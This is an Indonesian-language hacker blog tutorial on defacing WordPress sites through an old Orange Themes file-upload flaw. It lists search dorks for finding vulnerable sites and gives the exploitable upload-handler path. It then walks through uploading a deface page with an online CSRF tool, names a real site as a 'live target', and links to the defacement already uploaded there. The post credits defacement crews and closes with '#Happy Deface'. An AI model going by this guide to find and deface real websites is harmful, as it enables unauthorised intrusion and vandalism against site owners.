Tutorial Deface Poc Wp Orange Themes

Tutorial Deface Poc Wp Orange Themes

Oleh Xskyz07

Assalamualaikum hallo gan balik lagi sama gua kali ini gua bakal kasih tutorial deface poc wp orange themes ini poc cukup lama tapi masih ada web yg vuln :v

Oke untuk bahan bahan nya

-Hp/Pc

-Dork

-Exploit

-Sc Deface

Dork:

inurl:/wp-content/themes/kernel-theme

inurl:/wp-content/themes/bordeaux-theme

inurl:/wp-content/themes/bulteno-theme

inurl:/wp-content/themes/rayoflight-theme

Kembangin Lagi

Exploit:

wp-content/themes/rockstar-theme/functions/upload-handler.php

Karna gua ada live target jadi kaga usah ngedork lagi

Live Target Klik Disini

Pertama kasih exploit nya di belakang site yaaa....

Nah kalo tampilan nya kek gini tandanya web nya vuln langsung aja salin lalu ke csrf online

Tempel di url target untuk post file orange_themes kalo udh klik target key dan upload sc deface kalian

Kalo keluar nama sc yg kalian upload itu tanda berhasil ke upload tinggal panggil aja sc nya

Caranya?

www.site.com/wp-content/uploads/tahun/bulan/sclu.html

Oke disini gua perjelas make punya gua

https://www.123rock.net/wp-content/uploads/2021/03/az.html

Nah itu dia

Oke Done!!!

Oke segitu aja tutor dari gw kali ini semoga bermanfaat sekian dan terimakasih

Thanks To:

-All Member Indonesia Cyber Nightmare

-Black Brotherhood

-SevenGhost666

-Eagle Xploiter

-Doraemon Cyber Team

#Happy Learn

#Happy Deface